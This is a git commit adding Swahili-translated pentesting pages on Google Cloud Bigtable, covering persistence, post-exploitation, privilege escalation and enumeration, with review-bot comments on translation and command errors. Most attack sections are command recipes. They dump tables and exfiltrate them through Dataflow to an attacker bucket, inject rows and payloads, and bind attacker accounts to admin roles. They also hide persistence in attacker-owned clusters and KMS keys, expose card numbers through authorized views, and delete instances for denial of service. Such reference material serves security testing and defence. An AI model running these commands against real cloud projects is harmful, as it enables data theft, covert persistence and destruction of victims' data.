Translated ['src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigta

This commit is contained in:
Translator
2025-11-19 14:47:50 +00:00
parent 2b5af604d7
commit b473b823fd
4 changed files with 501 additions and 3 deletions

View File

@@ -0,0 +1,52 @@
# GCP - Bigtable Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa habari zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### App Profile ya mshambuliaji iliyotengwa
**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
Unda app profile inayowelekeza trafiki kwa replica cluster yako na wezesha Data Boost ili usitegeme tena provisioned nodes ambazo watetezi wanaweza kugundua.
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"
gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
```
Iwapo tu wasifu huu utakuwepo unaweza kuunganishwa tena kwa kutumia vyeti vipya vinavyorejea kwake.
### Maintain your own replica cluster
**Ruhusa:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
Sanidi klasta yenye idadi ndogo ya node katika eneo tulivu. Hata kama utambulisho za wateja zako zitapotea, **klasta inahifadhi nakala kamili ya kila jedwali** hadi watetezi waondoe waziwazi.
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
Fuatilia kwa kutumia `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` ili uweze kuongeza uwezo mara moja unapohitaji kutoa data.
### Weka replication nyuma ya CMEK yako mwenyewe
**Ruhusa:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` kwenye attacker-owned key.
Leta KMS key yako unapoanzisha clone. Bila funguo hiyo, Google haiwezi kuunda tena au kufanya failover kwenye cluster, hivyo blue teams wanapaswa kuratibu nawe kabla ya kuigusa.
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
Zungusha au uzime funguo katika mradi wako ili mara moja kuiharibu replica (lakini bado ukiruhusiwa kuiwasha tena baadaye).
{{#include ../../../banners/hacktricks-training.md}}
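Review bot: the new persistence file mixes languages in its labels: the app-profile section uses `**Permissions:**` while the two sections below it use `**Ruhusa:**`, and the heading `### Maintain your own replica cluster` is left in English between two translated headings. Suggest `**Ruhusa:**` throughout and a translated heading so this file reads consistently with the other files in the commit.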

View File

@@ -0,0 +1,252 @@
# GCP - Bigtable Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa maelezo zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
> [!TIP]
> Sakinisha CLI ya `cbt` mara moja kupitia Cloud SDK ili amri zilizo hapa chini zifanye kazi kwenye mashine yako:
>
> ```bash
> gcloud components install cbt
> ```
### Soma mistari
**Ruhusa:** `bigtable.tables.readRows`
`cbt` inakuja na Cloud SDK na inaweza kuwasiliana na admin/data APIs bila middleware yoyote. Elekeza `cbt` kwenye project/instance iliyovamiwa na tupa (dump) mistari moja kwa moja kutoka kwenye jedwali. Punguza skani ikiwa unahitaji tu kuangalia kwa haraka.
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
### Andika safu
**Ruhusa:** `bigtable.tables.mutateRows`, (utahitaji `bigtable.tables.readRows` kuthibitisha mabadiliko).
Tumia zana hiyo hiyo kufanya upsert ya seli zozote. Hii ndiyo njia ya haraka zaidi ya backdoor configs, drop web shells, au plant poisoned dataset rows.
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```
`cbt set` inakubali raw bytes kupitia sintaksia ya `@/path`, hivyo unaweza kusukuma compiled payloads au serialized protobufs hasa jinsi services za downstream zinavyotarajia.
### Toa rows kwenye bucket yako
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
Inawezekana exfiltrate yaliyomo ya jedwali lote hadi bucket inayodhibitiwa na mshambuliaji kwa kuanzisha job ya Dataflow ambayo inatiririsha rows ndani ya GCS bucket unayodhibiti.
> [!NOTE]
> Kumbuka kwamba utahitaji ruhusa `iam.serviceAccounts.actAs` juu ya SA fulani yenye ruhusa za kutosha kufanya export (kwa default, ikiwa haitatajwa vinginevyo, default compute SA itatumika).
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run dump-bigtable3 \
--gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
--project=gcp-labs-3uis1xlx \
--region=us-central1 \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
> [!NOTE]
> Badilisha kiolezo kuwa `Cloud_Bigtable_to_GCS_Parquet` au `Cloud_Bigtable_to_GCS_SequenceFile` ikiwa unataka matokeo ya Parquet/SequenceFile badala ya JSON. Ruhusa ni zile zile; njia ya kiolezo tu ndio inabadilika.
### Kuingiza safu
**Ruhusa:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
Inawezekana kuingiza yaliyomo ya jedwali zima kutoka kwenye bucket inayodhibitiwa na mshambulizi kwa kuanzisha job ya Dataflow inayotiririsha safu kwenye bucket ya GCS unayodhibiti. Kwa hili mshambulizi atalazimika kwanza kuunda faili ya parquet yenye data za kuingizwa na schema inayotarajiwa. Mshambulizi anaweza kwanza kusafirisha data kwa muundo wa parquet akifuata mbinu iliyotangulia na setting `Cloud_Bigtable_to_GCS_Parquet` na kisha kuongeza rekodi mpya kwenye faili ya parquet iliyopakuliwa
> [!NOTE]
> Kumbuka kwamba utahitaji ruhusa `iam.serviceAccounts.actAs` juu ya baadhi ya SA zenye ruhusa za kutosha kufanya export (kwa chaguo-msingi, ikiwa haijaonyeshwa vinginevyo, default compute SA itatumika).
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
### Kurejesha chelezo
**Ruhusa:** `bigtable.backups.restore`, `bigtable.tables.create`.
Mshambuliaji mwenye ruhusa hizi anaweza kurejesha chelezo katika jedwali jipya chini ya udhibiti wake ili aweze kupata tena data nyeti za zamani.
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
gcloud bigtable instances tables restore \
--source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
--async \
--destination=<TABLE_ID_NEW> \
--destination-instance=<INSTANCE_ID_DESTINATION> \
--project=<PROJECT_ID_DESTINATION>
```
### Undelete tables
**Ruhusa:** `bigtable.tables.undelete`
Bigtable inasaidia ufutaji wa muda (soft-deletion) kwa kipindi cha huruma (kwa kawaida siku 7 kwa chaguo-msingi). Katika dirisha hili, mshambuliaji mwenye ruhusa ya `bigtable.tables.undelete` anaweza kurejesha jedwali lililofutwa hivi karibuni na kupata tena data zake zote, na huenda akafikia taarifa nyeti ambazo zilidhaniwa zimeharibiwa.
Hii ni muhimu hasa kwa:
- Kupata tena data kutoka kwa jedwali zilizofutwa na walinzi wakati wa incident response
- Kupata data ya kihistoria ambayo ilifutwa kwa makusudi
- Kurejesha ufutaji wa bahati mbaya au wa uharibifu ili kudumisha persistence
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
> [!NOTE]
> Operesheni ya undelete inafanya kazi tu ndani ya kipindi cha retention kilichowekwa (default 7 days). Baada dirisha hili la muda litakapomalizika, jedwali na data zake zitaondolewa kabisa na haiwezi kurejeshwa kupitia njia hii.
### Tengeneza Authorized Views
**Ruhusa:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
Authorized views zinakuwezesha kuonyesha sehemu iliyochaguliwa ya jedwali. Badala ya kuzingatia least privilege, zitumie kuchapisha **hasa seti za safu/mstari zenye nyeti** unazozipenda na kuweka principal yako kwenye whitelist.
> [!WARNING]
> Tatizo ni kwamba ili kuunda authorized view pia unahitaji uwezo wa kusoma na kubadilisha mistari kwenye jedwali la msingi, kwa hivyo haupati ruhusa za ziada; kwa hiyo mbinu hii kwa kawaida haina matumizi.
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
"subsetView": {
"rowPrefixes": ["acct#"],
"familySubsets": {
"pii": {
"qualifiers": ["cc_number", "cc_cvv"]
}
}
}
}
EOF
gcloud bigtable authorized-views create card-dump \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/credit-cards.json
gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
Kwa sababu upatikanaji umewekwa wigo kwa view, watetezi mara nyingi hawazingatii kwamba umeunda endpoint mpya nyeti sana.
### Soma Authorized Views
**Ruhusa:** `bigtable.authorizedViews.readRows`
Ikiwa una upatikanaji wa Authorized View, unaweza kusoma data kutoka kwake kwa kutumia Bigtable client libraries kwa kubainisha jina la authorized view katika maombi yako ya kusoma. Kumbuka kwamba authorized view kwa kawaida itazuia kile unachoweza kufikia kutoka kwenye jedwali. Hapa chini kuna mfano kwa kutumia Python:
```python
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest
# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"
client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
request = ReadRowsRequest(
authorized_view_name=authorized_view_name
)
rows = data_client.read_rows(request=request)
for response in rows:
for chunk in response.chunks:
if chunk.row_key:
row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
print(f"Row: {row_key}")
if chunk.family_name:
family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
print(f" {family}:{qualifier} = {value}")
```
### Denial of Service via Delete Operations
**Ruhusa:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
Ruhusa zozote za Bigtable za kufuta zinaweza kutumiwa kama silaha kwa denial of service attacks. Mdukuzi mwenye ruhusa hizi anaweza kuvuruga shughuli kwa kufuta rasilimali muhimu za Bigtable:
- **`bigtable.appProfiles.delete`**: Futa profaili za programu, kuvunja muunganisho wa wateja na usanidi wa routing
- **`bigtable.authorizedViews.delete`**: Ondoa mitazamo iliyoruhusiwa, kukata njia halali za upatikanaji kwa programu
- **`bigtable.authorizedViews.deleteTagBinding`**: Ondoa binding za tag kutoka kwa mitazamo iliyoruhusiwa
- **`bigtable.backups.delete`**: Haribu snapshot za backup, kuondoa chaguzi za kurejesha baada ya maafa
- **`bigtable.clusters.delete`**: Futa klasta nzima, kusababisha kutokuwepo kwa data mara moja
- **`bigtable.instances.delete`**: Ondoa instances kamili za Bigtable, kufuta meza zote na usanidi
- **`bigtable.tables.delete`**: Futa meza binafsi, kusababisha hasara ya data na kushindwa kwa programu
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
--instance=<instance-id>
# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
--instance=<instance-id> --table=<table-id>
# Delete a backup
gcloud bigtable backups delete <backup-id> \
--instance=<instance-id> --cluster=<cluster-id>
# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
--instance=<instance-id>
# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
--instance=<instance-id>
# Delete an entire instance
gcloud bigtable instances delete <instance-id>
```
> [!WARNING]
> Operesheni za kufuta mara nyingi hufanyika mara moja na hazirudikiwi. Hakikisha kuna nakala za chelezo kabla ya kujaribu amri hizi, kwani zinaweza kusababisha upotevu wa data wa kudumu na usumbufu mkubwa wa huduma.
{{#include ../../../banners/hacktricks-training.md}}
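Review bot: the generic export command drops the parameter name for the project: `--parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,...` should read `--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,...`, as the worked example under it does; in the same command the placeholder `gs://dataflow-templates-us-<REGION>/...` cannot be satisfied by the same value as `--region=<REGION>`, and the example (`dataflow-templates-us-central1` with `--region=us-central1`) shows the intended `gs://dataflow-templates-<REGION>/` form. In the import section the template path has a stray bracket (`<VERSION>>`), and both the intro paragraph and the note are copied from the export flow (they still describe streaming rows into a bucket you control and doing an "export") although this job reads the Parquet file from the bucket into the table; reword them to describe the import direction.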

View File

@@ -0,0 +1,106 @@
# GCP - Bigtable Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
Kwa taarifa zaidi kuhusu Bigtable angalia:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### `bigtable.instances.setIamPolicy`
**Ruhusa:** `bigtable.instances.setIamPolicy` (na kawaida `bigtable.instances.getIamPolicy` kusoma current bindings).
Kumiliki sera ya IAM ya instance kunakuwezesha kujipa **`roles/bigtable.admin`** (au cheo maalum chochote) ambacho inasambaa kwa kila cluster, table, backup na authorized view katika instance.
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
> [!TIP]
> Ikiwa huwezi kuorodhesha bindings zilizopo, tengeneza waraka mpya wa sera na uiweke kwa `gcloud bigtable instances set-iam-policy` mradi tu unajiweka ndani yake.
Baada ya kupata ruhusa hizi, angalia katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) kwa mbinu zaidi za kutumia vibaya ruhusa za Bigtable.
### `bigtable.tables.setIamPolicy`
**Ruhusa:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).
Sera za instance zinaweza kufungwa wakati jedwali za kibinafsi zinapokelewa mamlaka. Ikiwa unaweza kuhariri table IAM, unaweza **kujipandisha kuwa mmiliki wa dataset lengwa** bila kuathiri workloads nyingine.
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
### `bigtable.backups.setIamPolicy`
**Ruhusa:** `bigtable.backups.setIamPolicy`
Backups zinaweza kurejeshwa kwenye **any instance in any project** unadhibiti. Kwanza, mpe identity yako access kwa backup, kisha uirestore ndani ya sandbox ambapo unashikilia Admin/Owner roles.
Kama una ruhusa `bigtable.backups.setIamPolicy` unaweza kujipa ruhusa `bigtable.backups.restore` kurejesha backups za zamani na kujaribu kupata taarifa nyeti.
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
--instance=<instance-id> --cluster=<cluster-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
Baada ya kufanya ukaguzi huu wa ruhusa, tazama [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kurejesha chelezo.
### Sasisha authorized view
**Permissions:** `bigtable.authorizedViews.update`
Authorized Views zinakusudiwa kuficha safu/kolamu. Kuziyabadilisha au kuzifuta kunaondoa vizuizi vya usalama vya kina ambavyo watetezi wanategemea.
```bash
# Broaden the subset by uploading a permissive definition
gcloud bigtable authorized-views update <view-id> \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/permissive-view.json --ignore-warnings
# Json example not filtering any row or column
cat <<'EOF' > /tmp/permissive-view.json
{
"subsetView": {
"rowPrefixes": [""],
"familySubsets": {
"<SOME FAMILITY NAME USED IN THE CURRENT TABLE>": {
"qualifierPrefixes": [""]
}
}
}
}
EOF
# Describe the authorized view to get a family name
gcloud bigtable authorized-views describe <view-id> \
--instance=<instance-id> --table=<table-id>
```
Baada ya kupata ruhusa hii, tazama katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kusoma kutoka kwa Authorized View.
### `bigtable.authorizedViews.setIamPolicy`
**Ruhusa:** `bigtable.authorizedViews.setIamPolicy`.
Mshambuliaji akiwa na ruhusa hii anaweza kujipa ufikiaji wa Authorized View, ambayo inaweza kuwa na data nyeti ambazo wangekuwa hawapati vinginevyo.
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'
```
Baada ya kuwa na ukaguzi huu wa ruhusa katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) ili kuona jinsi ya kusoma kutoka kwa view iliyoruhusiwa.
{{#include ../../../banners/hacktricks-training.md}}
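Review bot: in the `bigtable.authorizedViews.update` block the commands are in the wrong order: `gcloud bigtable authorized-views update ... --definition-file=/tmp/permissive-view.json` runs before the heredoc that writes that file, and the `describe` call meant to reveal a family name comes last; reorder to describe, write the JSON, then update. Same block: `FAMILITY` in the placeholder is a typo for `FAMILY`. The sentence after the `bigtable.tables.setIamPolicy` block is still in English ("After having this permission check in the ...") while its siblings are translated, and `**Permissions:**` in the update section should be `**Ruhusa:**` like the rest of the file. Lastly, the `bigtable.authorizedViews.setIamPolicy` example grants `roles/bigtable.viewer` and then points the reader at the read-from-view section, whereas the equivalent binding in the post-exploitation file grants `roles/bigtable.reader`; the two files should agree on the role that actually carries the row-read permission.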

View File

@@ -1,10 +1,71 @@
# GCP - Bigtable Enum
# GCP - Bigtable Uorodheshaji
{{#include ../../../banners/hacktricks-training.md}}
## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
## Bigtable
Huduma ya hifadhidata ya NoSQL inayosimamiwa kikamilifu, inayoweza kupanuliwa kwa mzigo mkubwa wa uchambuzi na operesheni yenye upatikanaji wa hadi 99.999%. [Learn more](https://cloud.google.com/bigtable).
Google Cloud Bigtable ni hifadhidata ya NoSQL iliyosimamiwa kikamilifu na inayoweza kupanuka, iliyoundwa kwa programu zinazohitaji throughput ya juu sana na latency ya chini. Imejengwa kushughulikia kiasi kikubwa cha data — petabytes katika maelfu ya nodes — na bado kutoa utendaji wa kusoma na kuandika kwa haraka. Bigtable ni bora kwa mizigo ya kazi kama data za time-series, telemetri ya IoT, uchambuzi wa kifedha, engines za personalization, na hifadhidata kubwa za uendeshaji. Inatumia muundo wa hifadhi wa ramani isiyojazwa, iliyogawanywa, yenye vipimo vingi na iliyopangwa kwa kisarufi, jambo linalofanya iwe ya ufanisi kuhifadhi jedwali pana ambapo safu nyingi zinaweza kuwa tupu. [Learn more](https://cloud.google.com/bigtable).
### Hierarki
1. **Bigtable Instance**
Mfano wa Bigtable ni rasilimali ya ngazi ya juu unayoitengeneza.
Hauhifadhi data yenyewe — fikiria kama kontena la kimantiki linalounganisha clusters na tables zako.
Kuna aina mbili za instances:
- Development instance (single-node, nafuu, si kwa uzalishaji)
- Production instance (inaweza kuwa na clusters nyingi)
2. **Clusters**
Cluster ina rasilimali halisi za compute na storage zinazotumika kutumikia data ya Bigtable.
- Kila cluster iko katika region moja.
- Imetengenezwa kwa nodes, ambazo zinatoa CPU, RAM, na uwezo wa mtandao.
- Unaweza kuunda instances zenye clusters nyingi kwa ajili ya upatikanaji wa juu au kusoma/kuandika duniani kote.
- Data inarekebishwa (replicated) kiotomatiki kati ya clusters katika instance ileile.
Muhimu:
- Jedwali (Tables) zinamilikiwa na instance, si cluster maalum.
- Clusters hutoa tu rasilimali za kutumikia data.
3. **Tables**
Jedwali katika Bigtable ni sawa na jedwali katika hifadhidata za NoSQL:
- Data huhifadhiwa kwa safu, zinazo tambuliwa kwa row key.
- Kila safu ina familia za safu (column families), ambazo zina safu (columns).
- Ni isiyojazwa: seli tupu hazitumiwi nafasi.
- Bigtable huhifadhi data iliyopangwa kwa msanii wa lexicographic kwa row key.
Jedwali hutumikishwa na clusters zote ndani ya instance.
4. **Tablets (and Hot Tablets)**
Bigtable hugawanya kila jedwali katika sehemu za usawa zinazoitwa tablets. Tablet ni:
- Anuwai ya mfululizo wa row keys.
- Imehifadhiwa kwenye node moja kwa wakati fulani.
- Tablets hugawanywa, kuunganishwa, na kuhamishwa kiotomatiki na Bigtable.
Hot tablet hutokea wakati:
- Kusoma au kuandika nyingi zinafika katika eneo lile la row-key (tablet moja).
- Tablet/node husika inazidiwa mzigo.
- Hii husababisha hotspots (vizuizi vya utendakazi).
5. **Authorized Views**
Authorized views zinakuwezesha kuunda kundi ndogo la data ya jedwali ambalo linaweza kushirikiwa na watumiaji au programu maalum bila kuwapa ufikiaji wa jedwali lote. Hii ni muhimu kwa:
- Kuzuia ufikiaji wa data nyeti.
- Kutoa ufikiaji wa kusoma pekee kwa safu au safu maalum.
6. **App Profiles**
App profile ya Bigtable ni usanidi unaobainisha jinsi programu au mteja anavyopaswa kuingiliana na instance ya Bigtable, hasa katika mazingira yenye clusters nyingi. Inasimamia tabia ya routing — kama maombi yaelekezwe kwa cluster moja au kugawanywa kwa clusters nyingi kwa ajili ya upatikanaji wa juu — na inadhibiti jinsi maandishi yanavyorekebishwa, kuchagua kati ya synchronous (muingiliano thabiti zaidi) au asynchronous (latency ya chini) modes.
```bash
# Cloud Bigtable
gcloud bigtable instances list
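Review bot: the replacement heading `## Bigtable` drops both the gcloud reference link and the `<a href="#cloud-bigtable" id="cloud-bigtable"></a>` anchor from the original heading, so existing links to `#cloud-bigtable` break; keep the anchor (and ideally the link) on the translated heading. The page title becomes `GCP - Bigtable Uorodheshaji` while the three new files in this commit keep English titles (`Persistence`, `Post Exploitation`, `Privesc`); pick one convention. Also, `kwa msanii wa lexicographic` in the Tables list is garbled; it should say rows are kept sorted lexicographically by row key (e.g. `kwa mpangilio wa lexicographic wa row key`).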
@@ -15,6 +76,11 @@ gcloud bigtable instances get-iam-policy <instance>
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Tables
gcloud bigtable tables list --instance <INSTANCE>
gcloud bigtable tables describe --instance <INSTANCE> <TABLE>
gcloud bigtable tables get-iam-policy --instance <INSTANCE> <TABLE>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE> <backupname>
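Review bot: the new table commands here use `gcloud bigtable tables list/describe/get-iam-policy`, whereas the post-exploitation file added in this same commit uses `gcloud bigtable instances tables list/restore/undelete/delete`, and the privesc file uses `gcloud bigtable tables add-iam-policy-binding`; align all of them on one command path (the `instances tables` form used for restore and undelete) so a reader can copy commands from either file. The flag style also differs (`--instance <INSTANCE>` here, `--instance=<instance-id>` in the other files), which is worth unifying at the same time.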
@@ -26,5 +92,27 @@ gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
## Authorized Views
gcloud bigtable authorized-views list --instance <INSTANCE> --table <TABLE>
gcloud bigtable authorized-views describe --instance <INSTANCE> --table <TABLE> <VIEW>
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-bigtable-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-bigtable-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-bigtable-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}